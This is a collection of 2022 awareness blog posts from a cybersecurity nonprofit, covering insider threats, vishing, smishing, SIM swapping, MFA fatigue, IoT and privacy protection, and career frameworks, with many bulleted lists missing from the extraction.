This past September, an information security designer by the name of Jareh Sebastian Dalke received a visit from the FBI in Denver Colorado. Mr. Dalke was arrested and charged with three counts of violating the Espionage Act. Apparently, he reached out to someone that he thought worked for a foreign government and told this individual that he had classified documents for sale. The two agreed to an $85,000 price. According to the story, in order to prove that what he had was legit, Mr. Dalke sent the foreign government official, who was actually an FBI agent, snippets of the documents which had the classification markings on them (Kelley, 2022).

This incident which occurred only two months ago is a perfect example of an insider threat, which is the subject of this blog. One disclaimer about this case. Mr. Dalke has only been charged with violating the Espionage Act. He is innocent until he is proven guilty by a jury of his peers (Kelley, 2022). I will discuss what an insider threat is, how to spot one, and what to do if you suspect there is an insider threat in your organization.

Before we can discuss what an insider threat is, we need to define what an insider is. Basically, an insider is anyone whether it is an employee or contractor that an organization trusts to give access to their resources. It can also be a vendor, custodian, or even a repair person. The Cybersecurity and Infrastructure Security Agency (CISA) has an extensive list of who could be considered an insider (Defining Insider Threats, n.d.).

The essence of an insider threat is the potential that an insider, which was described above, will use their access or knowledge of their organization’s resources for nefarious reasons. According to CISA, those reasons include:

An insider threat can take one of three forms:

Other threats:

Let's take a look at what may be indicators of an insider threat. One thing to keep in mind regarding any indicators is that just because an employee of an organization, remember from above that most cases of insider threat are employees, shows any one of these signs does not necessarily mean they are an insider threat. What needs to be noted is when an employee shows multiple signs below. The takeaway? If something does not seem right, say something to your supervisor or manager:

An example of an employee showing multiple indicators is as follows: an employee is overly critical of a poor performance appraisal, which he got because he is distracted due to financial issues resulting in his wife filing for divorce. These things make this employee vulnerable. One day he starts showing up to work in fancy cars and wearing newer clothes he normally does not wear. A week later he puts in for a vacation to a country that he cannot normally afford to go to, nor does he have an official reason to go. So, as we can see one indicator by itself is probably meaningless however, when stacked together, it becomes something that needs to be reported.


References

Credit Card Fraud: Tips For Prevention

by Eula Chua

November 2, 2022

Black Friday, Cyber Monday, and Boxing Day are coming before we know it. As we head into the holiday shopping season, I want to bring some awareness to credit card fraud.

As reported in the 2020 Federal Trade Commission Report, credit card fraud is ranked as one of the main types of identity theft reported and continues to rise.

Credit card fraud is an act of obtaining another individual’s credit card information without authorization or their knowledge, by placing random, unusual purchases, withdrawing funds, or creating new accounts. The fraudster’s main motive here is financial gain.

Credit card frauds happen more often than we think. To get a grasp of how it’s looking, check out Card Rates.com: 15 Disturbing Credit Card Fraud Statistics

Credit card fraud can occur in multiple ways, not limited to:

Although large-scale companies have a fraud investigations and data loss prevention team that work endlessly in the back end, doing our part as users and credit card owners in combination with the back end teams will help effectively prevent credit card fraud from happening to us.

What can we do right now?

Here are some practical tips we can do to prevent or to stop credit card fraud:


Resources:

OCT 26, 2022

Vishing Attacks in Depth

by Eula Chua

October 26, 2022

Once upon a time, we lived in a world without caller ID. Every time the phone rang, all we could do was answer it, hoping it wouldn’t be a random stranger trying to impersonate a service provider. It was highly likely that an adversary would pull this scam tactic.


You might ask, what is vishing?

Vishing is a form of phishing — a portmanteau of “voice phishing”. This occurs when an attacker utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. As caller IDs became a necessity in the telecom world, it helped filter out which phone numbers should be trusted based on what we know. But even then, attackers still found ways to overcome this challenge, which is why it still happens occasionally. In present time, VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID and setting up fake phone numbers that are difficult to track.


In vishing attacks, the adversary falsifies their identity by pretending to be a person of authority. The common vishing attacks that many hear about relate to tech support scams and automated scare-tactic voice messages. To be effective, most attacks similar to this are combined with other types of attacks such as identity fraud or ransomware attacks.


So, do they still happen?


The answer is yes.


Although phishing scams are more popular, according to Kroll (2022), vishing attacks have been on the rise, especially in 2022, and have been “occurring more than 1-in-4 times out of all types of response-based threats.” The more that technology develops, the more sophisticated and motivated these adversaries are to find ways to create these cyber attacks.


Below are some key patterns we all need to be aware of when encountering potential vishing attacks. For some extra context, here is a list of vishing attack principles compiled by the experts of Kroll (The Rise of Vishing and Smishing Attacks – The Monitor, Issue 21 | Kroll) for reference:







To avoid falling for vishing attacks, it is important to be aware of the characteristics and traits. Knowing how an attack works gives users the advantage to prevent future cyber incidents.


A few key points to remember:



As we are in the last week of Cybersecurity Awareness Month, let’s continue to strive staying safe online. Continue to protect your information and always stay vigilant. As mentioned earlier, the more technology develops, the more threat actors discover ways to trick users.


Remember, cybersecurity criminals never sleep! #Becybersafe all year round and keep an eye out for more related content here at Cybersecurity Central!

SIM Swapping

by James Driscoll

October 26, 2022

This week the topic discussed is SIM swapping. The reason I chose this topic is due to a news story that came out early last week. On 18 October, Verizon revealed that their prepaid service was attacked because of SIM swapping (Gatlan, 2022). A few things discussed today will be: 1) what is SIM swapping?   2) how does a SIM swap work, 3) Indicators of an attack, and 4) how to defend against this attack.

So, let us look at what SIM swapping, also known as SIM hijacking, is. It is pretty much as it sounds, moving the SIM card or E-SIM from one device to another. The key here is that it is the criminal that is doing the swapping, not the victim (SIM Swapping, n.d.). There are two reasons that criminals engage in this type of attack 1) is to take advantage of SMS messaging that some organizations use for their MFA, and 2) take advantage if MFA is not setup to secure an account (What is a SIM Swap, n.d.).

Now, let us move on and look at how this type of attack works. The typical SIM swapping attack starts with the victim giving the criminal their log in credentials through a phishing email (SIM Swapping, n.d.). This gives the criminal access to the victim’s online account. A second part of this attack involves the criminal taking over the victim’s email account that is associated with cell phone account (SIM Swapping, n.d.). The reason for this is that it gives the criminal to intercept any email correspondence from the phone company to the victim. Typical emails include confirmation that there was change to the account or One Time Passcodes (OTP), six digits used for authentication.

Once the criminal has control of the victims email and has the log in credentials for the account, they can conduct the SIM swapping attack. This can be done in a few ways: 1) online using the log in credentials received though the phishing email. 2) In person either by phone or by the criminal going inside the phone company’s physical location (Cryptopedia Staff, 2021). One thing to keep in mind is that no matter how this is done there is going to be social engineering performed.

So, how can a person tell if they are a victim of a SIM swap? As it turns out there are three indicators a person might be a victim of an attack. 1) The victim cannot access their online account. 2) There is no service despite being in an area with good reception. 3) The victim somehow receives a notification about account changes they did not make (Adamu, 2022).

Now that we have looked at what a SIM swap attack is and how to spot one, let us now move onto what can be done to protect ourselves from being a victim. Believe it or not, there is a lot we can do. Below are seven recommendations:









References

OCT 19, 2022

Five Eyes Alliance and Privacy 

by James Driscoll

October 19, 2022

Over the past couple of weeks a few news stories I have seen and a few podcasts I listen to have recently started to talk about a group that I have not heard about in a long time. That group is called the Five Eyes. I remember the first time I heard of them a couple of years ago. So, for those people that are not familiar with them, this blog is specifically designed for you as I will talk about who they are, what their purpose, and other interesting tidbits of information that may be relevant. Plus, how does this relate to privacy.

So, what exactly is Five Eyes? Five eyes is an alliance between the United States, the United Kingdom, Australia, Canada, and New Zealand. This alliance was formed in 1946 with the purpose of making it easy for the countries in the alliance to share surveillance and intelligence information with each other (Five Eyes, n.d.). Now, the types of intelligence that this alliance focuses on is human intelligence, signal intelligence, geo intelligence, and finally defense intelligence (Taylor, 2022).

Would it surprise anyone that in addition to the Five Eyes Alliance, there is also a Nine Eyes Alliance. This alliance is made up of the Five Eyes countries, plus the following: Denmark, France, Netherlands, and Norway. The goal of this alliance is the same as the Five Eyes Alliance. Now, I would imagine some people are thinking Nine countries that share intelligence information, that is not too bad. Just wait a minute, I have one more alliance to go over. The final alliance is called 14 Eyes. They are made up of the Nine Eyes countries plus Germany, Belgium, Italy, Sweden, and Spain (Taylor, 2022).

So, what do these alliances have to do with our privacy? Well, remember what the goal of these alliances (more specifically the Five Eyes Alliance) is to share surveillance and intelligence information. What everyone needs to pay attention to is the surveillance portion of that goal. The reason I say specifically the Five Eyes Alliance is because the United Kingdom and the United States are considered the biggest violators in terms of privacy.

For example, the United Kingdom passed a law in 2016 that basically tells both Internet Service Providers and phone companies to record things like browsing history, connection times and text messages for a period of two years. Also, that information must be made available to authorities whenever they ask for it. A warrant is not required (Taylor, 2022).

The reason the United States made the list of the biggest privacy violators is because not only are they conducting mass surveillance similar to the United Kingdom under a program called PRISM, but in 2017 Internet Service Provides became authorized to not only collect users information, but they can also sell it to other organizations (Taylor, 2022) .

So, lets pivot and discuss what we as individuals can do to protect our privacy. First, we can get away from email providers like Yahoo and Gmail. The reason is that Yahoo has been caught scanning users emails on behalf of the US Government. The reason for getting rid of Gmail is because they have been caught letting users emails be accessed by third parties. Now, I would bet some people are asking what email providers we are supposed to use that are more secure. You’re in luck as I have you covered with nine options

I know what you are thinking reading this list and you are correct in that some of them are in one of the other alliances. Keep in mind that we are focusing on avoiding the Five Eyes Alliance specifically. That is not to say that the other alliances do not violate privacy, I would imagine they do, but to a lesser extent (Taylor, 2022).

Another option that is available we can all use to protect our privacy is to use a Virtual Private Network (VPN). For those that do not know what a VPN does, it encrypts between a user’s device and the VPN server. This makes it impossible for an ISP to not only read the traffic being sent, but also to determine a user’s IP address and location. One thing to look for when choosing a VPN is to ensure that the company does not keep logs. The reason for that is if there are logs, then authorities in the countries that VPN is in can request access to them, which defeats the whole aspect of using a VPN to ensure privacy.

The digital privacy advocacy group Restore Privacy has a list of nine VPN providers they recommend however of those nine only three have been certified as not collecting logs. The nine that are recommended include:


Below are the three VPN providers that are certified to not collect logs.


There is one final thing that we all can do to protect our privacy. That is to stop using insecure search engines such as Google and Bing, just to name the main ones and move to more secure search engines. There are four that are outside the Five Eyes Alliance, which include:

There are also three that while they are located within the Five Eyes Alliance, are still recommended due to their privacy policies. They are:

One thing to remember is that the above recommendations is not an all-inclusive list of what we can do to ensure our privacy. One thing missing is web browsers. There are more secure browsers them Chrome and Edge.

Basically, what this comes down to is trust. With the information that has been provided, does everyone trust that their privacy is ensured with what you are currently using . Before we as individuals can answer that question, we all need to look at our own situation, threat model and whether an adversary would have a reason to target you. We also need to determine if we are comfortable with our governments basically having unrestricted access to our information.

References

Analyzing a Smishing Attack

by Eula Chua

October 19, 2022

Phishing attacks have become more sophisticated and found their way to other avenues. This week, I will be helping you analyze a Smishing attack.

A Smishing attack is part of the phishing family. It’s a cyber attack where text messages are sent by an attacker to trick victims into clicking a malicious link, sharing sensitive information, or sending money to a “trusted” organization. The characteristics and motives are almost identical except for the fact that it’s sent via SMS. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.

Since text messages do not have a dedicated spam folder, we cannot filter them out. They come through easier and are more likely to be opened by users who are unaware whether they are spam or not.

The following image is an example of a text message I received from someone claiming to be “Canada Revenue Agency” or CRA. In America, the equivalent would be the IRS (Internal Revenue Service). In the perspective of a user, it may be hard to identify whether this is coming from the actual agency.

In regards to this example, here are some questions to ask:

Smishing schemes are made to create doubt in our thought process. This is one of the main tactics of conducting a successful attack. To help combat this, the questions you ask yourself will lead you to make the right judgement, especially if you’re not sure when you encounter a text message like this. I recommend approaching text messages like these with a curious mind. Think critically and ask yourself questions. If you feel like something is fishy, then you’re probably right.

Instead of me listing out what may be suspicious about this, I want you to try figuring out this one. Take out a pen and paper or your digital notes. What are some of the red flags you see in this text message? 

Share it with us by snapping a photo or a screenshot and send it in our LinkedIn comments section of this week’s #BlogByCC post!

OCT 12, 2022

Trust Your Gut - Analyzing a Phishing Emailyzing a Phis- Analyzing a P

by Eula Chua

October 12, 2022

Phishing is one of the most common cyber attacks used in today’s world. It uses a combination of social engineering techniques to lead a target into sending sensitive information for financial gain or to gain access to critical resources. To read more about phishing, click here for my previous post.

As we celebrate #CybersecurityAwarenessMonth, this week, we will look into analyzing a phishing email that I received in my spam/junk folder in their inbox. We will be using Phishing.org’s Common Features of Phishing Emails as a tool to help us learn how to distinguish an illegitimate email by its writing style, by the sender’s address, the links attached to it, and many more indicators. This demonstration is done for educational purposes only. I do not recommend anyone sifting through their spam inbox as the attached links may be infected or lead to malicious websites (unless an email you were expecting from a reliable source somehow landed there. Don’t worry, it happens.) Some emails get passed the filter and land in your inbox. In case you come across a spam email, here’s what to watch out for.

Exhibit A: Money Transfers:


Many of the phishing emails I’ve seen almost always involve money in it. This email in particular mentions that I will be sent an incredible amount of money but what for? Why would the “FBI Headquarters” contact me through a random test email (test@rapidsms.net) from someone I don’t recognize (I personally don’t know anyone named Christopher A. Wray)?

If you read the email, you will notice that the beginning sentence attempts to list actual organizations to get you to think that this is legitimate, even though you may not have used any of their services. You will also notice that the grammar and punctuation are not done properly. The person they are asking to contact doesn’t actually have an official “western union” email.

To reference some common features of phishing emails with all that we have listed, we can come to the conclusion that this email is too good to be true and that it came from an unusual sender. There’s a sense of urgency in the email where we are notified about the deadline to lodge the claim but it’s not as emphasized compared to other emails that heavily use that trait.

Can you find any more noticeable traits about this email that we haven’t mentioned yet? Let us know! Remember to review the common features of phishing emails and if you’re unsure whether an email you received came from the right source, use your best judgment. Next week, we will continue to practice analyzing other phishing emails, this time involving “order transactions” from a "legitimate” company. Until then, trust your gut and don’t open that suspicious email!

Securing IoT Devices

by James Driscoll

October 12, 2022

What exactly are IoT devices? IoT stands for “Internet of Things”. They are also known as smart devices. Now, let me ask what comes to mind when you hear the term “IoT device”? I would bet a lot of the answers are going to be the Amazon Echo, or the Google Home, am I correct? Now, there are a lot more than just those two. The list includes smart refrigerators, smart watches, smart fire alarms, smart door locks, smart bicycles, medical sensors, fitness trackers, smart security systems, and the list goes on (18 Most Popular IoT Devices in 2022 (Only Noteworthy IoT Products, 2022).

While IoT devices are great in that they make our lives a little bit easier, they do have one serious flaw. IoT devices are configured for ease of setup / use, not security or privacy. To prove my point, I looked for a story regarding baby monitors being hacked. Yes, certain models of baby monitors are IoT devices.

I do not know if you all remember but there were stories every couple of months a few years ago, but we do not hear much about it now.

So, the story I found is from 2018 about a mom in South Carolina initially noticed unusual activity on her baby monitor. One morning she wakes up and sees that that the monitor is directly facing her. While she thought this was weird, she dismissed it thinking her husband was known to move the monitor through the application on his smart phone so he could check on her while at work. Seems logical to me, as I have something similar, but not a baby monitor, that I can use to check on my wife while I am gone. However, the second incident has no logical explanation to it. It happened while both the husband and wife were having dinner together. The wife got an alert on her phone that the camera was moving, but they were both at home in the same room and neither one had opened the app and moved the camera. What the wife did next was the best thing she could do, and that was to not only disconnect the baby monitor, but also call law enforcement.

When an officer arrives the wife describes what happened and said she suspected the baby monitor had been hacked. So, the officer decided to do a little investigating and wanted to test that theory. The officer had her reconnect everything and that is when she discovered she had been locked out of her own account (Domonoske, 2018). Pretty scary stuff.

Now at this point some people may be thinking how this happened. Remember what I said earlier. IoT devices are configured for ease of setup / use, not security or privacy. Also keep in mind that these devices could have vulnerabilities that are not seen on computers. I am talking about vulnerabilities that could allow a device to reset back to default settings (to include login credentials). I mention that because in the story when the monitor was setup the password was changed to something unique to the device and was not used anywhere else (Domonoske, 2018).

After reading this story, I am willing to bet that some of you are wondering if it is even possible to secure IoT devices and my answer to that is yes, they can be secured. In fact, there are six that can be taken to secure IoT devices. One disclaimer. I know the site says seven tips and I am listing 6. I did that because I combined changing the Login ID and password to a single item.

1. Start with configuring the router correctly.

a. Do not use default credentials. Change both the login ID and password.

b. Use highest level of encryption possible. You are looking for WPA2 or WPA3. Anything less than that (WEP or WPA), you need a newer model.

2. Put IoT devices on their own network separate from everything else.

a. Basically, create a guest network for IoT devices. By doing this, you will prevent criminals from accessing the main network if an IoT device is hacked.

3. Another option is to turn off features you are not going to use.

4. Update the devices firmware. Keep in mind that this typically does not occur automatically. So, it may have to be completed manually. That means setting a calendar reminder once a quarter or so and following the directions to update, that should be included with the documentation for that device.

5. Implement MFA if available. Now, I know that this option is a little counterintuitive as it takes the ease of use out of the device, but it will add to the security.

6. Use a secondary Next Generation Fire Wall (NGFW). This is an option because while most routers that were built within the last few years probably have a fire wall, they may not offer the protection you want. In that case purchasing an NGFW and using it in conjunction with the router would do the trick (Goodreau, n.d.).

So, the bottom line here is that we as individual end users of these products are responsible for our security. We cannot rely on the product manufacturers to be security minded. As I have said a couple times in this blog, manufacturers want people to have a product that is easy to setup/use. This is what makes them money. If a product is not easy to setup/use, people are not going to buy it and the company is not going to make money, which is what matters to them.

References

18 Most Popular IoT Devices in 2022 (Only Noteworthy IoT Products. (2022, September 24). Retrieved from Software Testing Help: https://www.softwaretestinghelp.com/iot-devices/#:~:text=Smart%20Mobiles%2C%20smart%20refrigerators%2C%20smartwatches,few%20examples%20of%20IoT%20products 


Domonoske, C. (2018, June 5). S.C. Mom Says Baby Monitor was Hacked; Experts Say Many Devices are Vulnerable. Retrieved from NPR: https://www.npr.org/sections/thetwo-way/2018/06/05/617196788/s-c-mom-says-baby-monitor-was-hacked-experts-say-many-devices-are-vulnerable 


Goodreau, T. (n.d.). 7 Actionable Tips to Secure Your Smart Home and IoT Devices. Retrieved from IEEE Computer Society: https://www.computer.org/publications/tech-news/trends/7-actionable-tips-to-secure-your-smart-home-and-iot-devices 




OCT 5, 2022

Mindfulness is a Must

by Kimberly McKnight

October 5, 2022

One of the main reasons for naming my nonprofit Cybersecurity Central was because to be a resource for those who desire is to constantly learn more about tech, infosec, cybersecurity, and preparation for career development and reaching our human potentials.


This particular blog post, and many of the topics I discuss personally, are around the human side of careers. I heard of mindfulness training and CBT, (cognitive behavioral therapy), but had no personal experiences using these resources myself, until recently. 


Mindfulness allows us to relocate confidence we may have lost, or never built within ourselves, it helps to focus on what is important and relates to our mission in our journey, and it is a complete gamechanger when discovered and tapped into.


For many reasons, things have been out of line for quite some time in my life, and the discovery of learning to change my mindset has been a true help in allowing me to realign and restructure plans and next steps in my tech and infosec career.


Below are some #mindset resources I use personally and want to share with you. If you have mastered this art and already possess a positive and confident mindset, share the resources with your network. It's mind-blowing to learn how many others are waiting to discover how to influence their own mindset and become the best versions of themselves they are capable of being. Leaders and influencers included! It's not just the n00bs full of insecurities. 


Aligned in Tech was the first podcast still sticking to the tech theme, but started to lean into mindset, and how to rethink my value as a career changer and what I bring to the table. The shows consist of several things I heard before, but was captured so simply and delivered with support, from experience, allowing you to absorb and make the necessary mind shifts necessary to excel in our lives. 


Brave to Be Multipassionate by Kate Kim was the next podcast I found, after seeing a post from Kate on LinkedIn. Wow! What a gem of a podcast! I have found more resources and individuals to follow from listening to her podcast than I can count! She hosts amazing guests who are more than research worthy, each with great initiatives and platforms themselves. Do yourself a favor and make this a must listen, (or watch now on YouTube), especially if you're anything like me and have passions in many places throughout your life. 


The next resource is Positively Living podcast from Lisa Zawrotny, whom I discovered while listening to Kate's Brave to Be Multipassionate podcast! Talk about hitting all the areas... Lisa covers everything from how to organize your LIFE, and how to have a positive and productive mindset while doing so. If you want to get organized, and learn various methods from multiple expert sources, this is a show for you. Add it to your list of favorites!


Last up, a self-help and self-therapy book, "The CBT Deck: 101 Practices to Improve Thoughts, Be in the Moment & Take Action in Your Life."  This is something I found on Amazon covering Cognitive Behavioral Therapy, CBT, specifically. Although the podcasts above may not mention CBT directly, I found much of the mindset talks, insights, and help provided goes right back to CBT. Instead of opting for the physical deck of cards (the "paperback" option on Amazon), I decided to go with the Audible version where I can listen to the cards, anywhere from 5-15 minutes per day. It will depend on your style of intake as to which method you may prefer. Kindle version is also available. I can tell you for the few weeks I've been using this, I have noted a big difference in my overall outlook and confidence in my abilities and BHAG goals


Now that you have these resources for mindfulness, connect on social on let us know what you think! Feel free to tag @cybersecuritycentral in your posts! We would love to highlight and share your post!


If you haven't already, please be sure to check out Cybersecurity Central’s YouTube channel and subscribe to follow the latest! Follow us on LinkedIn at Cybersecurity Central


I greatly appreciate your support of Cybersecurity Central and can't thank you enough for tuning in each week to hang out with us!


Now go check out some of these insightful and inspiring mindfulness resources. You will not be disappointed!  


Cookie Policies & Privacy Pop-Ups

by James Driscoll

October 5, 2022

Imagine you are browsing the internet and come across a website that contains a popup screen, covering the entire page, like in the screenshot below. 


Note: MyFitnessPal.com is the website used as an example throughout this blog.

Basically, this popup screen is asking users to click “Accept” and the screen will go away.  The question I have is do you grumble and begrudgingly click “Accept” or do you the options and read about how a site uses and stores your data?  Have you noticed that some websites you visit have this popup and some do not?  Does everyone know why we constantly see these popup screens?  If you cannot answer these questions, do not worry as I will talk about each one of them.


Each site that has a privacy policy with a pop-up screen provides links that users can click on to learn how their information is being used and stored.  On this site users can read about their data rights and options, the terms and conditions of use, and the privacy policy.  There is also a link for users to opt out of certain cookies.  Finally, users can click on the “Accept” button to agree to all cookies. 


Before diving deeper into the these pop-ups, I think it helps to understand why pop-ups are here in the first place.  About three years ago, privacy pop-ups came about in the California Consumer Privacy Act (CCPA) of 2018.  The CCPA officially became law in Jan 2020 and mandates that websites advise their users what information they collect and how they intend to use it (Healey, 2021).


Another major reason for these pop-ups is the EU’s General Data Protection Regulation (GDPR), which mandates sites that collect the personal information of EU citizens comply with this new regulation. Companies globally had to adjust and ensure their websites were in compliance with GDPR in order to continue serving customers in these countries. 


Back to our example website, MyFitnessPal.com. What are the options available?  The first option is to read exactly what the data rights and options are.  The Readers Digest version is the site tells users that they have the option to opt out of personalized and targeted advertising.  It also gives users directions on limiting cookies and other tracking technologies.  Next, they give directions on changing device settings for both iOS and Android.  Finally, there are even steps on how users can access their data and export it to a file (Data Management, n.d.). 


Next, let’s look at their Terms and Conditions of Use.  This page spells out what users can and cannot do with their site.  It is basically a legal disclaimer designed to protect them and their users (MyFitnessPal Terms and Conditions of Use, n.d.).  Every site you go to is going to have this page.  Some sites will make it easier to find than others.


The third and final policy that we have is the Privacy Policy.  This page talks about how the site collects and uses user information.  They also discuss how and to whom they share user information.  Reading further on, they discuss the legal reasons for collecting and sharing user information.  They also include situations where users are asked for consent to information sharing. 


Now, there is one more option available. If you review the above screen shot, there is an option to opt out of specific cookies.  This means users can choose which cookies are accepted, or not.  The options may vary from site to site, and based on user region. 


So, let’s take a further look, shall we?  As you can see in the next screenshot tells users why cookies are used.  Users can also agree to all of them and proceed or they can click on more information and choose which cookies they want to accept.

If we click on “More Information," we find a couple of options that users can opt in or out of.  As shown in the below screenshot below, there are three sets of cookies: “Required Cookies”, “Functional Cookies”, and “Advertising Cookies”.  Notice users can only opt in or out of the “Functional Cookies”, and the “Advertising Cookies”.  The reason is “Required Cookies” are necessary for the site to function properly.  The other two are completely optional.


UPDATE:  As I am writing this blog, new information has come out regarding these cookie consent notifications.


According to the Bleeping Computer news site, seeing these consent pop-ups may mean users are already being tracked.  The reason they say that is because in some cases, these pop-ups facilitate a “privacy breaching data exchange before the user can opt out” (Toulas, 2022).


Now, you may be asking what are our options?  Well, one option is to completely stop using the internet.  Before I am written off as insane, I understand this is impossible.  Our lives are so intertwined with the internet that the actuality of this happening is next to zero.  But, it is still an option.  A second option is to continue with the status quo.  A third option?  Yes, ladies and gentlemen, there is a third option available: Use the Brave browser.  This is now an option because starting with the upgrade that comes out this month, which will be version 1.45, Brave will block users from seeing these consent pop-ups (Toulas, 2022).


Bottom line, when you get to a website with one of these privacy pop-ups, I highly recommend taking some time to read through the policies.  I say that because I want everyone to be informed as to how their information is being collected and used.  Keep in mind that the information these sites collect, and use is your information and you as the owner of that information get to dictate whether a website can not only collect, but also use that information. 


References:


SEP 28, 2022

MFA Fatigue

by James Driscoll

September 28, 2022

The data breach at Uber is just the latest in a long list of data breaches this year. While the tactic used to gain network, access is not new, I do not believe it has gotten a lot of press till now. You all might be wondering which tactic that is. That would be Multi-Factor Authentication (MFA) fatigue. So, what is MFA fatigue? As we all know, there are different types of MFA. They include hardware keys, biometrics, authentication applications, SMS, and push notifications. MFA fatigue targets push notifications (Abrams, 2022).


The way this attacks works is the threat actor gets an employee’s credentials, either by phishing or buying them off the dark web or some other way. Then the threat actor tries to log in and the victim gets a push notification. Obviously, the victim knowing they are not attempting to log in, is not going to accept the notification. Now, not having gained access to the network, the threat actor will continue to attempt to log in repeatedly in rapid succession until the victim gets tired of the notification that they finally decide to accept it just to make the notifications stop (Abrams, 2022).


So, what can be done to safeguard against this type of attack? Artic Wolf, a leading Cybersecurity company has three recommendations.


1. Educate all users on indicators of an attack:


a. Unexpected MFA push notifications

b. Unknown location of login attempt

c. Receiving communication supposedly from a person in the organizations IT department asking the user to accept the request

d. Continuous MFA requests in rapid succession over a short period of time


2. Restrict the number of MFA push notifications allowed


3. Disable MFA push notifications and use another form of MFA (Tatar, 2022)


One thing to keep in mind is that MFA is another tool in the cybersecurity toolbox. It is subject to compromise just like any other tool we have. The reason I say that is because from what I have seen is that the expectation is for MFA to be the end all be all of security, but it is not. I am pretty sure that is an unpopular opinion and that is fine.


I am pretty sure that some people reading this are wondering “if MFA can be compromised, then why use it?”. This is a valid question. The reason MFA still needs to be used is because it is part of a layered defense. By that I mean the first layer are a user’s login credentials (username and password). If those get compromised, that is when the second layer (MFA) comes into play and will generally prevent a threat actor from gaining access to an organizations network.


Like I alluded to earlier, MFA is not foolproof, as proven with the attack on Uber and numerous other organizations. I mean let’s be honest, if a threat actor wants to gain access to a network, they are going to find a way in. The whole point of using MFA as part of a layered defense is to make gaining access to our networks so difficult and time consuming that they move onto another target. The military would consider this being a “hard target”. By being a “hard target”, your organization becomes less desirable to an attack and a threat actor will normally move onto another target.


There are two important takeaways I want everyone to gain from this blog:



References

Abrams, L. (2022, September 20). MFA Fatigue: Hackers' New Favorite Tactic in High-Profile Breaches. Retrieved from Bleeping Computer: 

MFA Fatigue: Hackers’ new favorite tactic in high-profile breaches


Reupert, A., Straussner, S. L., Weimand, B., & Mayberry, D. (2022, March 11). It Takes a Village to Raise a Child: Understanding and Expanding the Concept of the "Village". Retrieved from Frontiers: It Takes a Village to Raise a Child: Understanding and Expanding the Concept of the “Village”


Tatar, S. (2022, September 22). The Growing Risk of MFA Fatigue Attacks. Retrieved from Artic Wolf: What is MFA Fatigue? | Arctic Wolf


Cybersecurity Awareness All Year Round

by Eula Chua

September 28 2022

We have a lot coming for you this October for Cybersecurity Awareness Month. To get you prepared for what’s to come, here’s a quick background of what Cybersecurity Awareness Month is about.


In October 2004, Cybersecurity Awareness month was established as a joint initiative by the National Cybersecurity Alliance and the U.S. Department of Homeland Security.


With the continuous rise of confidential data being uploaded online and the rise of current and upcoming cyber threats, this month is about creating awareness to help all types of users stay safe and protected online.


This year's campaign theme is, “See Yourself in Cyber.” Technology continues to adapt and improve every single day. This year’s main focus will be on putting people first when it comes to cybersecurity. As developers, administrators, or end users, we all play a part in technology. It’s important to highlight preventable measures we can take to protect our online privacy and data, in the hopes of building up a safer cyber space together. For more information, check out: 

Cybersecurity Awareness Month | CISA


Although we have a whole month dedicated to Cybersecurity Awareness, did you know that there are other days where we can celebrate it all year round? Here are more days that you can add to your calendar:



Are you participating in this year’s Cybersecurity Awareness Month? 


Connect with us on Cybersecurity Central's socials and tell us about it!



SEP 21, 2022

Cybersecurity Workforce Framework - NIST & NICE

by James Driscoll

September 21, 2022

Let's begin with a typical conversation between someone in Cybersecurity and someone wanting to break in to the industry. New person: “I want to get into Cybersecurity, but do not know where to start”. Cybersecurity professional: “What part of Cybersecurity do you want to get into?” New person: “I do not know.


Does this sound familiar? It should because I am willing to bet that most if not all of us have either initiated or been a party to this very type of conversation. How do we respond when a new person says, “I do not know”, when asked what part of Cybersecurity they want to get into? Luckily, NIST has us covered. They created the National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework.


The NIST NICE Framework also known as NIST SP 800-181, was created in 2017 to deconstruct the Cybersecurity realm into 52 roles. It also acts as a foundational reference that provides base line information regarding the knowledge, skills, and abilities (KSA’s) for these roles. It was updated to Rev. 1 in November 2020 (Newhouse, Keith, Scribner, & Witte, 2017).


One thing that I like about this framework is that it is easy to read. It is logically laid out. Now, as with any other framework, NIST 800-181 is full of acronyms however, the first time one is used it is spelled out, which alleviates some confusion for people reading it. Another aspect of it I like is that is spells out not only who the audience is, but how it is going support them. For example, NIST 800-181 is designed for everyone, but for employers, there are five aspects that will help them basically write a job description for a particular role. It also describes how it supports current and aspiring employees. Finally, it discusses support for the educators, trainers, and technology providers (Newhouse, Keith, Scribner, & Witte, 2017).


So, everyone might be wondering what part of NIST 800-181 do we refer a new person to when answering they do not know what part of Cybersecurity they want to get into. Well, there is a table in Attachment A3. Specifically, they want to look at the Work Role, which is in the middle of the table, and the Role Description, which is the far right of the table (Newhouse, Keith, Scribner, & Witte, 2017). One thing to keep in mind is that while as stated earlier the NICE Framework identifies 52 roles, that does not mean that individual organizational positions are going to be identified the same way. This may cause some confusion. The best idea that I can think of to alleviate that confusion is to compare the role description in the NICE Framework with the job description is in the job ad.


In addition to the identified roles, the NICE Framework also breaks down those roles and identifies applicable tasks, knowledge, skills, and abilities (KSA’s) required for the specific role. This is going to be in Appendix B. I must warn everyone, this table used a lot of codes to identify the tasks and KSA’s. The tasks / KSA’s codes and their definition are in Appendix A. That means there is going to be a lot of going back and forth between the two Appendices.


Now, if you remember from earlier, I said that the NICE Framework is designed to be used by everyone, not just people trying to decide on what part of Cybersecurity to get into. For example, organizations can use Appendix A and B when they are creating job advertisements. Also, managers can use those same appendices when deciding on employee training.


So, if there is one NIST Framework that I think everyone must read, it would be NIST 800-181. It has information applicable to everyone. For new people wanting to break into the Cybersecurity industry, it breaks down the industry into 52 roles, which can assist them in deciding what part of Cybersecurity they want to get into. For HR, it has a listing of KSA’s for those specific roles, which will help them in creating accurate job listings for open positions. Finally, for trainers, NIST 800-181 can be used as a resource as they create training programs, courses, seminars, exercises, and challenges as they can be based on role specific tasks and associated KSA’s.


References

Newhouse, W., Keith, S., Scribner, B., & Witte, G. (2017, August). NIST Special Publication 800-181. Retrieved from National Institute of Standards and Technology: https://doi.org/10.6028/NIST.SP.800-181


Staying Safe in the Digital World

by Eula Chua

September 21 2022

Not many realize it., but the need for cybersecurity has increased in today’s time and will continue to increase as technology progresses.


Earlier this week, I encountered an elderly client who told me that he did not want to give out his email address unless it was absolutely necessary. This led him to share about a deepfake AI incident he heard about, where another elderly person was lured into believing that the service provider she was communicating with was the “actual” service provider, when in fact, was a scam. She lost thousands of dollars and had a lack of support. It was devastating to hear but even more devastating to know that incidents like this happen daily without us even knowing.


